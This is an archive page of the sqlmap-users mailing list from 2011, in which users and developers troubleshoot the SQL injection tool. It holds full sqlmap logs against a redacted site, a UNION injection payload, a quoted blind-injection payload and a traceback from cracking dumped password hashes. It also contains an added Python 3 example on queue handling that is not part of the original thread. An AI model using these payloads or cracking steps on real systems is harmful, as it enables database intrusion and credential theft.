sqlmap-users Mailing List for sqlmap (Page 86)
From: Miroslav S. <mir...@gm...> - 2011-07-12 21:45:51
found one (VM) and done some tests :)

you are right, subqueries can't be used on MySQL < 4.1 which means that sql injection there is of no significant value (e.g. dumping of table content which inherently requires subquerying mechanism).

kr

--
Miroslav Stampar (@stamparm)

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Miroslav S. <mir...@gm...> - 2011-07-12 21:23:13
ok, got the point.

also seen the same thing on Twitter few days ago, maybe it was you :)

two things:
A) does anyone have experience with subqueries on MySQL < 4.1?
B) is there some VM around that carry for example MySQL 3.x ready for testing?

kr

On Tue, Jul 12, 2011 at 1:01 PM, Till .ch <ti...@ho...> wrote:
> Hi
>
> Lately I've been playing with sqlmap and a 4.0 mysql server. Sqlmap detected
> the injection point just fine, but struggled with gathering information
> about other tables.
> I guess this happened due to the fact that subqueries have been introduced
> with mysql >=4.1 (http://dev.mysql.com/doc/refman/4.1/en/news-4-1-x.html)
> and thus payloads like the following are regarded as an invalid query on
> mysql <4.1:
>
> [PAYLOAD] 1234 AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)) FROM randomtable),1,1)) > 51
>
> Best Regards
> Till

--
Miroslav Stampar (@stamparm)

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Miroslav S. <mir...@gm...> - 2011-07-12 21:17:35
ok. i see that you've tried those --time-sec and --technique=U :)

now to resume a bit. "Generic UNION injections" are tricky ones. best thing would be if you could send us the -t traffic.txt of --technique=U --flush-session run.

kr

--
Miroslav Stampar (@stamparm)

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Miroslav S. <mir...@gm...> - 2011-07-12 21:13:35
hi all.

little tutorial for all of you. spot the problematic parts:

A)
[14:39:55] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. if the problem persists please wait for few minutes and rerun without flag T in --technique option (e.g. --flush-session --technique=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2)

B)
....
[14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
....

C)
do you want to exploit this SQL injection? [Y/n] Y
[14:40:13] [INFO] testing MySQL
[14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the next form

now. do you see the problem yourself?

that warning message says it all. have you tried lowering the --time-sec value? have you tried running with --technique=BEUS?

thing is that in INNER JOIN cases injecting TIME BASED payloads can do lots of "[CRITICAL]" messages. hence that nice warning message :)

kr

On Tue, Jul 12, 2011 at 10:49 PM, Bernardo Damele A. G. <ber...@gm...> wrote:
> Hi Joahnna,
>
> Try to provide --union-char and --union-cols after you have verified
> the UNION query SQL injection manually in your browser.
> Rerun with --flush-session and -t traffic.log and inspect the log file
> afterwards to see if the SQL payload is indeed part of the HTTP
> response you expect it.
> If the fingerprint keeps failing, provide sqlmap with --dbms "mysql 5".
>
> Bernardo
>
> On 12 July 2011 14:32, Joahnna Marie Damiao <dam...@ya...> wrote:
>> Hi,
>> Below is the sqlmap command. Next time I ran it, it already says that the parameter filename is not injectable. However, I always get an info that the target URL is UNION injectable but the number of columns change every session. I also used the --technique=U --dbms=mysql --flush-session --level=3 --risk=3 and even the --time-sec=2 but I only get UNION injectable message but nothing is vulnerable. What seems to be the problem here? Anybody can help me?
>>
>> C:\Python27\sqlmap>python sqlmap.py -u "xxxxxxx" --forms --batch --beep
>>
>> sqlmap/1.0-dev (r4221) - automatic SQL injection and database takeover tool
>> http://www.sqlmap.org
>>
>> [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
>>
>> [*] starting at 14:39:37
>>
>> [14:39:37] [INFO] setting file for logging HTTP traffic
>> [14:39:37] [INFO] testing connection to the target url
>> [14:39:38] [INFO] searching for forms
>> [#1] form: [INFO]
>> GET xxxxxxxxx
>> do you want to test this form? [Y/n/q]
>> > Y
>> Edit GET data [default: xxxxxxxx
>> do you want to fill blank fields with random values? [Y/n] Y
>> [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\xxxx\session' as session file
>> [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' as results file
>> [14:39:38] [INFO] testing if the url is stable, wait a few seconds
>> [14:39:39] [INFO] url is stable
>> [14:39:39] [INFO] testing if GET parameter 'productid' is dynamic
>> [14:39:39] [WARNING] GET parameter 'productid' appears to be not dynamic
>> [14:39:39] [WARNING] heuristic test shows that GET parameter 'productid' might not be injectable
>> [14:39:39] [INFO] testing sql injection on GET parameter 'productid'
>> [14:39:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>> [14:39:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
>> [14:39:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
>> [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
>> [14:39:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
>> [14:39:40] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [14:39:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>> [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>> [14:39:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [14:39:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>> [14:39:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>> [14:39:41] [INFO] testing 'Oracle AND time-based blind'
>> [14:39:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [14:39:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [14:39:42] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. you can try to explicitly set it using the --dbms option
>> [14:39:44] [WARNING] GET parameter 'productid' is not injectable
>> [14:39:44] [INFO] testing if GET parameter 'name' is dynamic
>> [14:39:44] [WARNING] GET parameter 'name' appears to be not dynamic
>> [14:39:44] [WARNING] heuristic test shows that GET parameter 'name' might not be injectable
>> [14:39:44] [INFO] testing sql injection on GET parameter 'name'
>> [14:39:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>> [14:39:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
>> [14:39:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
>> [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
>> [14:39:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
>> [14:39:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [14:39:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>> [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>> [14:39:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [14:39:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>> [14:39:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>> [14:39:46] [INFO] testing 'Oracle AND time-based blind'
>> [14:39:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [14:39:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:39:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [14:39:50] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:39:51] [WARNING] GET parameter 'name' is not injectable
>> [14:39:51] [INFO] testing if GET parameter 'filename' is dynamic
>> [14:39:52] [WARNING] GET parameter 'filename' appears to be not dynamic
>> [14:39:52] [WARNING] heuristic test shows that GET parameter 'filename' might not be injectable
>> [14:39:52] [INFO] testing sql injection on GET parameter 'filename'
>> [14:39:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>> [14:39:52] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:39:53] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:39:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
>> [14:39:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
>> [14:39:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
>> [14:39:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
>> [14:39:55] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [14:39:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>> [14:39:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>> [14:39:55] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:39:55] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. if the problem persists please wait for few minutes and rerun without flag T in --technique option (e.g. --flush-session --technique=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2)
>> [14:39:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [14:39:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>> [14:39:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>> [14:39:56] [INFO] testing 'Oracle AND time-based blind'
>> [14:39:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [14:39:57] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [14:40:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:07] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:08] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:09] [CRITICAL] unable to connect to the target url or proxy
>> [14:40:09] [INFO] target url appears to be UNION injectable with 10 columns
>> [14:40:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:13] [CRITICAL] unable to connect to the target url or proxy
>> [14:40:13] [INFO] GET parameter 'filename' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
>> GET parameter 'filename' is vulnerable. Do you want to keep testing the others? [y/N] N
>> sqlmap identified the following injection points with a total of 414 HTTP(s) requests:
>> ---
>> Place: GET
>> Parameter: filename
>> Type: UNION query
>> Title: Generic UNION query (NULL) - 1 to 10 columns
>> Payload: productid=Bbvv&name=ihOH&filename=BVux' UNION ALL SELECT NULL, 'xsDiekxuxW', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Aege'='Aege&creationdate=OnGh&encodingformat=AZfu&productgroup=NdSR&producepriority=FatH&isactive=on&comment=uPni
>> ---
>>
>> do you want to exploit this SQL injection? [Y/n] Y
>> [14:40:13] [INFO] testing MySQL
>> [14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
>> [14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the next form
>> [14:40:16] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv'
>>
>> [*] shutting down at 14:40:16
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: Unavailable

--
Miroslav Stampar (@stamparm)

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-12 20:53:45
Hi Till,

Is the injection point only boolean? No UNION? No error-based? Try to increase the value of --level. Can you enumerate the -b? A run with -t traffic.log and inspection of the log file afterwards would be helpful.

I reckon I've only detected a SQL injection in MySQL < 4.1 long time ago and as far as I remember it worked with sqlmap, but I might be wrong.

Bernardo

On 12 July 2011 12:01, Till .ch <ti...@ho...> wrote:
> Hi
>
> Lately I've been playing with sqlmap and a 4.0 mysql server. Sqlmap detected
> the injection point just fine, but struggled with gathering information
> about other tables.
> I guess this happened due to the fact as subqueries have been introduced
> with mysql >=4.1 (http://dev.mysql.com/doc/refman/4.1/en/news-4-1-x.html)
> and thus payloads like the following are regarded as an invalid query on
> mysql <4.1:
>
> [PAYLOAD] 1234 AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32))
> FROM randomtable),1,1)) > 51
>
> Best Regards
> Till

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-12 20:49:23
Hi Joahnna,

Try to provide --union-char and --union-cols after you have verified the UNION query SQL injection manually in your browser. Rerun with --flush-session and -t traffic.log and inspect the log file afterwards to see if the SQL payload is indeed part of the HTTP response you expect it. If the fingerprint keeps failing, provide sqlmap with --dbms "mysql 5".

Bernardo

On 12 July 2011 14:32, Joahnna Marie Damiao <dam...@ya...> wrote:
>
> Hi,
> Below is the sqlmap command. Next time I ran it, it already says that the parameter filename is not injectable. However, I always get an info that the target URL is UNION injectable but the number of columns change every session. I also used the --technique=U --dbms=mysql --flush-session --level=3 --risk=3 and even the --time-sec=2 but I only get UNION injectable message but nothing is vulnerable. What seems to be the problem here? Anybody can help me?
>
> > C:\Python27\sqlmap>python sqlmap.py -u "xxxxxxx" --forms --batch --beep

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-12 20:45:34
Hi Olu,

This should be fixed now. Can you please retry your run after an svn update and report back?

Bernardo

On 12 July 2011 14:47, Olu Akindeinde <sey...@gm...> wrote:
> Hi guys,
> I got this error from SQLMap when attempting to crack the hashes discovered

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
From: Olu A. <sey...@gm...> - 2011-07-12 13:47:07
Hi guys,

I got this error from SQLMap when attempting to crack the hashes discovered

[14:44:17] [INFO] using hash method: 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[14:44:18] [INFO] using default dictionary
[14:44:18] [INFO] loading dictionary from '/Users/fx/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[14:44:21] [INFO] starting dictionary attack (md5_generic_passwd)
[14:44:21] [INFO] starting 4 processes
[14:44:24] [INFO] current status: 104% (zoagi...)
[14:44:24] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4257), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4257)
Python version: 2.6.1
Operating system: posix
Command line: ./sqlmap.py -u ******************************************** -v 3 -D ********** -T ********* --dump --replicate --parse-errors --threads=10 --level=3 --risk=3
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 86, in main
    start()
  File "/Users/fx/sqlmap/lib/controller/controller.py", line 554, in start
    action()
  File "/Users/fx/sqlmap/lib/controller/action.py", line 109, in action
    conf.dbmsHandler.dumpTable()
  File "/Users/fx/sqlmap/plugins/generic/enumeration.py", line 1742, in dumpTable
    attackDumpedTable()
  File "/Users/fx/sqlmap/lib/utils/hash.py", line 290, in attackDumpedTable
    results = dictionaryAttack(attack_dict)
  File "/Users/fx/sqlmap/lib/utils/hash.py", line 583, in dictionaryAttack
    results.extend([retVal.get() for i in xrange(retVal.qsize())] if retVal else [])
  File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/multiprocessing/queues.py", line 113, in qsize
    return self._maxsize - self._sem._semlock._get_value()
NotImplementedError

[*] shutting down at 14:44:24

Kind Regards,
Olu
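The traceback above ends in multiprocessing's Queue.qsize() raising NotImplementedError, which Python's documentation says can happen on Unix platforms such as Mac OS X where sem_getvalue() is not implemented. The following is an added example in Python 3, not sqlmap's code and not the fix referred to in the reply; it shows a sentinel-based way to collect worker results that never calls qsize(). The names worker, NoQsizeQueue, DONE and the sample items are hypothetical.

```python
"""Draining a multiprocessing.Queue without relying on qsize().

Added example (Python 3). Not sqlmap code and not the fix mentioned above.
"""
import multiprocessing
import queue

DONE = None  # sentinel: each worker puts this last; real results are tuples


class NoQsizeQueue(queue.Queue):
    """Constructed stand-in for a platform whose Queue.qsize() is unimplemented."""

    def qsize(self):
        raise NotImplementedError


def collect_with_qsize(q):
    """Pattern from the traceback: size the read loop with qsize()."""
    return [q.get() for _ in range(q.qsize())]


def collect_with_sentinels(q, n_workers, timeout=30.0):
    """Read results until all n_workers have sent DONE.

    Never calls qsize() or empty(), so it behaves the same on every platform.
    Raises RuntimeError rather than blocking forever if a worker dies silently.
    """
    results, finished = [], 0
    while finished < n_workers:
        try:
            item = q.get(timeout=timeout)
        except queue.Empty:
            missing = n_workers - finished
            raise RuntimeError("%d worker(s) never signalled completion" % missing)
        if item is DONE:
            finished += 1
        else:
            results.append(item)
    return results


def worker(worker_id, items, out):
    """Hypothetical worker: upper-cases its items as a placeholder for real work."""
    try:
        for item in items:
            out.put((worker_id, item.upper()))
    finally:
        out.put(DONE)  # sent even if the loop raised, so the parent never hangs


def run_parallel(chunks):
    """Start one process per chunk and return all results, sorted."""
    out = multiprocessing.Queue()
    procs = [multiprocessing.Process(target=worker, args=(i, chunk, out))
             for i, chunk in enumerate(chunks)]
    for proc in procs:
        proc.start()
    # Drain before join(): a child that still has queued data buffered
    # does not exit, so joining first can deadlock.
    results = collect_with_sentinels(out, len(procs))
    for proc in procs:
        proc.join()
    return sorted(results)


if __name__ == "__main__":
    # Constructed sample input.
    print(run_parallel([["alpha", "bravo"], ["charlie"], []]))
```
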
From: Joahnna M. D. <dam...@ya...> - 2011-07-12 13:39:42
Note: I just updated my sqlmap version. I'm now running the r4258.

--- On Tue, 7/12/11, Joahnna Marie Damiao <dam...@ya...> wrote:

From: Joahnna Marie Damiao <dam...@ya...>
Subject: [sqlmap-users] MySQL Union technique gives out inconsistent results
To: sql...@li...
Date: Tuesday, July 12, 2011, 3:32 PM

Hi,
Below is the sqlmap command. Next time I ran it, it already says that the parameter filename is not injectable. However, I always get an info that the target URL is UNION injectable but the number of columns change every session. I also used the --technique=U --dbms=mysql --flush-session --level=3 --risk=3 and even the --time-sec=2 but I only get UNION injectable message but nothing is vulnerable. What seems to be the problem here? Anybody can help me?

C:\Python27\sqlmap>python sqlmap.py -u "xxxxxxx" --forms --batch --beep
From: Joahnna M. D. <dam...@ya...> - 2011-07-12 13:33:05
Hi,
Below is the sqlmap command. Next time I ran it, it already says that the parameter filename is not injectable. However, I always get an info that the target URL is UNION injectable but the number of columns change every session. I also used the --technique=U --dbms=mysql --flush-session --level=3 --risk=3 and even the --time-sec=2 but I only get UNION injectable message but nothing is vulnerable. What seems to be the problem here? Anybody can help me?

C:\Python27\sqlmap>python sqlmap.py -u "xxxxxxx" --forms --batch --beep

    sqlmap/1.0-dev (r4221) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:39:37

[14:39:37] [INFO] setting file for logging HTTP traffic
[14:39:37] [INFO] testing connection to the target url
[14:39:38] [INFO] searching for forms
[#1] form: [INFO]
GET xxxxxxxxx
do you want to test this form? [Y/n/q]
> Y
Edit GET data [default: xxxxxxxx
do you want to fill blank fields with random values? [Y/n] Y
[14:39:38] [INFO] using 'C:\Python27\sqlmap\output\xxxx\session' as session file
[14:39:38] [INFO] using 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' as results file
[14:39:38] [INFO] testing if the url is stable, wait a few seconds
[14:39:39] [INFO] url is stable
[14:39:39] [INFO] testing if GET parameter 'productid' is dynamic
[14:39:39] [WARNING] GET parameter 'productid' appears to be not dynamic
[14:39:39] [WARNING] heuristic test shows that GET parameter 'productid' might not be injectable
[14:39:39] [INFO] testing sql injection on GET parameter 'productid'
[14:39:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:39:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[14:39:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[14:39:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:39:40] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:39:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[14:39:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:39:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[14:39:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[14:39:41] [INFO] testing 'Oracle AND time-based blind'
[14:39:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[14:39:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:39:42] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. you can try to explicitly set it using the --dbms option
[14:39:44] [WARNING] GET parameter 'productid' is not injectable
[14:39:44] [INFO] testing if GET parameter 'name' is dynamic
[14:39:44] [WARNING] GET parameter 'name' appears to be not dynamic
[14:39:44] [WARNING] heuristic test shows that GET parameter 'name' might not be injectable
[14:39:44] [INFO] testing sql injection on GET parameter 'name'
[14:39:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:39:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[14:39:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[14:39:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:39:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:39:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[14:39:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:39:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[14:39:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[14:39:46] [INFO] testing 'Oracle AND time-based blind'
[14:39:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[14:39:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:39:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:39:50] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:39:51] [WARNING] GET parameter 'name' is not injectable
[14:39:51] [INFO] testing if GET parameter 'filename' is dynamic
[14:39:52] [WARNING] GET parameter 'filename' appears to be not dynamic
[14:39:52] [WARNING] heuristic test shows that GET parameter 'filename' might not be injectable
[14:39:52] [INFO] testing sql injection on GET parameter 'filename'
[14:39:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:39:52] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:39:53] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:39:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[14:39:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:39:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[14:39:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:39:55] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:39:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[14:39:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[14:39:55] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:39:55] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. if the problem persists please wait for few minutes and rerun without flag T in --technique option (e.g. --flush-session --technique=BEUS) or try to lower the --time-sec value (e.g.
--time-sec=2) [14:39:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [14:39:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [14:39:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [14:39:56] [INFO] testing 'Oracle AND time-based blind' [14:39:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [14:39:57] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [14:40:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:07] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:08] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:09] [CRITICAL] unable to connect to the target url or proxy [14:40:09] [INFO] target url appears to be UNION injectable with 10 columns [14:40:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:13] [CRITICAL] unable to connect to the target url or 
proxy [14:40:13] [INFO] GET parameter 'filename' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable GET parameter 'filename' is vulnerable. Do you want to keep testing the others? [y/N] N sqlmap identified the following injection points with a total of 414 HTTP(s) req uests: --- Place: GET Parameter: filename Type: UNION query Title: Generic UNION query (NULL) - 1 to 10 columns Payload: productid=Bbvv&name=ihOH&filename=BVux' UNION ALL SELECT NULL, 'xsD iekxuxW', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Aege'='Aege&cre ationdate=OnGh&encodingformat=AZfu&productgroup=NdSR&producepriority=FatH&isacti ve=on&comment=uPni --- do you want to exploit this SQL injection? [Y/n] Y [14:40:13] [INFO] testing MySQL [14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the next form [14:40:16] [INFO] you can find results of scanning in multiple targets mode insi de the CSV file 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' [*] shutting down at 14:40:16 |
From: Till .c. <ti...@ho...> - 2011-07-12 11:01:13
|
Hi

Lately I've been playing with sqlmap and a 4.0 MySQL server. Sqlmap detected the injection point just fine, but struggled with gathering information about other tables.
I guess this happened due to the fact that subqueries were introduced with MySQL >= 4.1 (http://dev.mysql.com/doc/refman/4.1/en/news-4-1-x.html) and thus payloads like the following are regarded as an invalid query on MySQL < 4.1:

[PAYLOAD] 1234 AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)) FROM randomtable),1,1)) > 51

Best Regards
Till
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-11 23:35:49
|
Fixed now. Thanks for reporting.

Bernardo

On 11 July 2011 16:04, 1ndr4 joe <c0d...@gm...> wrote:
> [WARNING] unknown charset 'sql_ascii'. Please report by e-mail to
> sql...@li...

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
